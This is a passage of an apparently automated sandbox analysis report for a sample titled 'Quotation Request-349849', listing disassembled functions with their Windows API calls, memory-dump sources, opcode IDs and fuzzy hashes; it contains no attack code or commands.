                                                      • Instruction Fuzzy Hash: B621A6745087159F8700DF28C88586ABBE8FF95368F104A1EF499D72A2D735DE45CB82
                                                      Function 0082DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0082F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0082DCD3,?,?,?,0082EAC6,00000000,000000EF,00000119,?,?), ref: 0082F0CB
                                                        • Part of subcall function 0082F0BC: lstrcpyW.KERNEL32(00000000,?,?,0082DCD3,?,?,?,0082EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0082F0F1
                                                        • Part of subcall function 0082F0BC: lstrcmpiW.KERNEL32(00000000,?,0082DCD3,?,?,?,0082EAC6,00000000,000000EF,00000119,?,?), ref: 0082F122
                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0082EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0082DCEC
                                                      • lstrcpyW.KERNEL32(00000000,?,?,0082EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0082DD12
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0082EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0082DD46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      • Opcode ID: efa8b812d42d582cdfe0b67414969a843cb5734b48f9817ed2f4f4b882e64640
                                                      • Instruction ID: bf556498571aaf6d4979c49dbff4bb00f9b8628ffabf1509a9971411c09bcbec
                                                      • Opcode Fuzzy Hash: efa8b812d42d582cdfe0b67414969a843cb5734b48f9817ed2f4f4b882e64640
                                                      • Instruction Fuzzy Hash: 0111D33A200715EBDB25AF34E845D7A7BB8FF45310B40402AF906CB3A1EB759881CBD1
                                                      Function 008050E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00805101
                                                        • Part of subcall function 007F571C: __FF_MSGBANNER.LIBCMT ref: 007F5733
                                                        • Part of subcall function 007F571C: __NMSG_WRITE.LIBCMT ref: 007F573A
                                                        • Part of subcall function 007F571C: RtlAllocateHeap.NTDLL(01530000,00000000,00000001,00000000,?,?,?,007F0DD3,?), ref: 007F575F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: b732e67cdd9135455ab5c997cdc4bc59abcf3007064f67a33913b4e8c3537120
                                                      • Instruction ID: 2492e207fe52087cc47d103128ae3d041ed0754a254adff19a717fa68ffebf4b
                                                      • Opcode Fuzzy Hash: b732e67cdd9135455ab5c997cdc4bc59abcf3007064f67a33913b4e8c3537120
                                                      • Instruction Fuzzy Hash: 9A1191B2604A19EEDBA12F74AC4977F3798FF04361B10092AFA55D6391DE3889409AA1
                                                      Function 00846369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00837896,?,?,00000000), ref: 007D5A2C
                                                        • Part of subcall function 007D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00837896,?,?,00000000,?,?), ref: 007D5A50
                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00846399
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 008463A4
                                                      • _memmove.LIBCMT ref: 008463D1
                                                      • inet_ntoa.WSOCK32(?), ref: 008463DC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 1504782959-0
                                                      • Opcode ID: 022eb0d7b5c4389523ddce02adb1247ed3c4cb8d105b680b7ccbd3b143eb1790
                                                      • Instruction ID: ff50d640809621c6ba642d5f5722bbd01ab50f76385f4e34013d31845140cf72
                                                      • Opcode Fuzzy Hash: 022eb0d7b5c4389523ddce02adb1247ed3c4cb8d105b680b7ccbd3b143eb1790
                                                      • Instruction Fuzzy Hash: FF113A36500109EFCB00FBA4DD4ACAEBBB8FF44311B144066F605E7262EB34AE14DB61
                                                      Function 00828B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00828B61
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00828B73
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00828B89
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00828BA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: df0941e01ad0361ae938d1db09c215ae10c381d374fe931ef92c0d9cf26d8bbb
                                                      • Instruction ID: 117ac8b710bd11680329400da6e21226f002d6614ef3f8e686200efeeff9b103
                                                      • Opcode Fuzzy Hash: df0941e01ad0361ae938d1db09c215ae10c381d374fe931ef92c0d9cf26d8bbb
                                                      • Instruction Fuzzy Hash: B2110A79901218FFDF11DB95C885E9DBBB4FB48710F204095EA00B7250DA716E51DB94
                                                      Function 007D1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 007D12D8
                                                      • GetClientRect.USER32(?,?), ref: 0080B5FB
                                                      • GetCursorPos.USER32(?), ref: 0080B605
                                                      • ScreenToClient.USER32(?,?), ref: 0080B610
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                      • String ID:
                                                      • API String ID: 4127811313-0
                                                      • Opcode ID: 7a7d3f9951210fcb023d45a55107bafa58ad123473b3715b65348008358e36db
                                                      • Instruction ID: 5ea407b81af1a5d821a9aec916b1701563e3b4646d3d137e86143b8f322cc706
                                                      • Opcode Fuzzy Hash: 7a7d3f9951210fcb023d45a55107bafa58ad123473b3715b65348008358e36db
                                                      • Instruction Fuzzy Hash: 9F112535A00119FBCB10EFA8D8899AE77B9FB05301F900466FA01E7241D739BA55CBA5
                                                      Function 00831142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0082FCED,?,00830D40,?,00008000), ref: 0083115F
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0082FCED,?,00830D40,?,00008000), ref: 00831184
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0082FCED,?,00830D40,?,00008000), ref: 0083118E
                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,0082FCED,?,00830D40,?,00008000), ref: 008311C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: b42af3b1f608c81bc69053e8659ac2801e4c172b9708808ce14567650d7ae3ef
                                                      • Instruction ID: bbd73207e886ac8118f0d47adefe1b6800c25dbd7bdcb9fd70f2977e07cc5c6d
                                                      • Opcode Fuzzy Hash: b42af3b1f608c81bc69053e8659ac2801e4c172b9708808ce14567650d7ae3ef
                                                      • Instruction Fuzzy Hash: 3E113C31D41A1DD7CF00AFA5D848AEEBB78FF49B11F004055EA41F2241CB749560CBD5
                                                      Function 0082D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0082D84D
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0082D864
                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0082D879
                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0082D897
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      • Opcode ID: a04029876c0fe7f5f943504c25fde7315d21f37544cb55c66680160140ad6422
                                                      • Instruction ID: 622398818522acb87b1fa5d25d201a0dd5b87e50e9f0fe2051b91147149ec246
                                                      • Opcode Fuzzy Hash: a04029876c0fe7f5f943504c25fde7315d21f37544cb55c66680160140ad6422
                                                      • Instruction Fuzzy Hash: FC115EB5605329DBE3208F50EC08F93BBBCFB00B04F108979AA56D6051D7B4E5899BA5
                                                      Function 0085B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 0085B2E4
                                                      • ScreenToClient.USER32(?,?), ref: 0085B2FC
                                                      • ScreenToClient.USER32(?,?), ref: 0085B320
                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0085B33B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                      • String ID:
                                                      • API String ID: 357397906-0
                                                      • Opcode ID: eb4b4b0f2b52a6ae15bda28e64326fc87fc938a00c2e2f303e11f472f8fa3980
                                                      • Instruction ID: 8ca4a2bb39c6638590bff277c4363b578a392c9ead195434eb7863650064953c
                                                      • Opcode Fuzzy Hash: eb4b4b0f2b52a6ae15bda28e64326fc87fc938a00c2e2f303e11f472f8fa3980
                                                      • Instruction Fuzzy Hash: B41144B9D00209EFDB41CFA9C8849EEBBF9FF18311F108166E914E3220D735AA558F50
                                                      Function 0085B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0085B644
                                                      • _memset.LIBCMT ref: 0085B653
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00896F20,00896F64), ref: 0085B682
                                                      • CloseHandle.KERNEL32 ref: 0085B694
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3277943733-0
                                                      • Opcode ID: 91631c27445d21ed29cadd1816835e01d997917caeb7152d8cebb0a18663768a
                                                      • Instruction ID: 4b8a6f0042f653fa6f186b0936515f8ca1f0f59711f4e9da7b67dc31f5b1644c
                                                      • Opcode Fuzzy Hash: 91631c27445d21ed29cadd1816835e01d997917caeb7152d8cebb0a18663768a
                                                      • Instruction Fuzzy Hash: 73F019B2640304BBF71037657C09FBB7A9CFB15795F044021FB08E51A2EB755C2087A9
                                                      Function 00836BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00836BE6
                                                        • Part of subcall function 008376C4: _memset.LIBCMT ref: 008376F9
                                                      • _memmove.LIBCMT ref: 00836C09
                                                      • _memset.LIBCMT ref: 00836C16
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00836C26
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                      • String ID:
                                                      • API String ID: 48991266-0
                                                      • Opcode ID: e6b049158bd253fdb165fb5134dd45ea1eb9bf50abc9ed77d34061bcef2abef1
                                                      • Instruction ID: 26447aca32116608569b49240741d9efb23217cabd82487c51f76917dee0093e
                                                      • Opcode Fuzzy Hash: e6b049158bd253fdb165fb5134dd45ea1eb9bf50abc9ed77d34061bcef2abef1
                                                      • Instruction Fuzzy Hash: E6F0547A200204BBCF016F55DC85A4ABB29FF45361F048061FE099E227DB35E811CBF5
                                                      Function 007D2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 007D2231
                                                      • SetTextColor.GDI32(?,000000FF), ref: 007D223B
                                                      • SetBkMode.GDI32(?,00000001), ref: 007D2250
                                                      • GetStockObject.GDI32(00000005), ref: 007D2258
                                                      • GetWindowDC.USER32(?,00000000), ref: 0080BE83
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0080BE90
                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0080BEA9
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0080BEC2
                                                      • GetPixel.GDI32(00000000,?,?), ref: 0080BEE2
                                                      • ReleaseDC.USER32(?,00000000), ref: 0080BEED
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1946975507-0
                                                      • Opcode ID: bca654f83a01f77983f3a289f0d5b5bf83cd848d38592d8280c2821fe840f5d1
                                                      • Instruction ID: 4e3771239114560e519c8eb9063b296ac98c8e9aba76d2a812f4f9434157ddfb
                                                      • Opcode Fuzzy Hash: bca654f83a01f77983f3a289f0d5b5bf83cd848d38592d8280c2821fe840f5d1
                                                      • Instruction Fuzzy Hash: 66E03932144644AADF225F64EC0DBD83B20FB15332F008366FB69980E29B754981DB12
                                                      Function 00828712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 0082871B
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,008282E6), ref: 00828722
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008282E6), ref: 0082872F
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,008282E6), ref: 00828736
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: 9617ef5b64237c52d7398ad8bd2470ea1e636876365e938cc2d4abfbe39d009e
                                                      • Instruction ID: 442c5c8e682f0bb38f54beb1ca551459b7a875aba02cc55c32020c80d12b54a6
                                                      • Opcode Fuzzy Hash: 9617ef5b64237c52d7398ad8bd2470ea1e636876365e938cc2d4abfbe39d009e
                                                      • Instruction Fuzzy Hash: 05E04F766123219BDB605FB16D0CB973BA8FF60793F144828A345CA081DA2884818750
                                                      Function 0082B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0082B4BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ContainedObject
                                                      • String ID: AutoIt3GUI$Container
                                                      • API String ID: 3565006973-3941886329
                                                      • Opcode ID: 1e93d0e2ead8b843271942e8aead3cc667d82eb68815c7c51cf9698f7a4b430f
                                                      • Instruction ID: 932a589e12ec8c817eb64e04e05a1a56ffb931a158479ef4add65765ffb85c21
                                                      • Opcode Fuzzy Hash: 1e93d0e2ead8b843271942e8aead3cc667d82eb68815c7c51cf9698f7a4b430f
                                                      • Instruction Fuzzy Hash: FB914870601615AFDB14DF68D884A6ABBF5FF49710F20856EE94ACB391DB70E881CB50
                                                      Function 0083AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007EFC86: _wcscpy.LIBCMT ref: 007EFCA9
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • __wcsnicmp.LIBCMT ref: 0083B02D
                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0083B0F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                      • String ID: LPT
                                                      • API String ID: 3222508074-1350329615
                                                      • Opcode ID: d4d986eed66c1436d0d9df77c8818dce71cbac1b0ac5db512711c316d46387e8
                                                      • Instruction ID: 8157abc6561d64703589f682e3990afe33503ee48c7ee6cd8cc84d287a76fbc8
                                                      • Opcode Fuzzy Hash: d4d986eed66c1436d0d9df77c8818dce71cbac1b0ac5db512711c316d46387e8
                                                      • Instruction Fuzzy Hash: A16140B5A00219EFCB18DF94C895EAEB7B4FB48710F10406AFA16EB351D774AE44CB90
                                                      Function 007E2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 007E2968
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 007E2981
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: e85b96378beea4fb05a0d2908f3a2387c5fcebaf9c81c0d52b8df1f4e2daad7d
                                                      • Instruction ID: eaaa07fef6c2adfc22bf66f44e93594c7354fcf4750deefc57ed25b4741be188
                                                      • Opcode Fuzzy Hash: e85b96378beea4fb05a0d2908f3a2387c5fcebaf9c81c0d52b8df1f4e2daad7d
                                                      • Instruction Fuzzy Hash: 175134724087449BD320EF10D88ABABBBF8FB85344F41885EF2D9412A5DB348569CB67
                                                      Function 00839734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                      Download Yara Rule
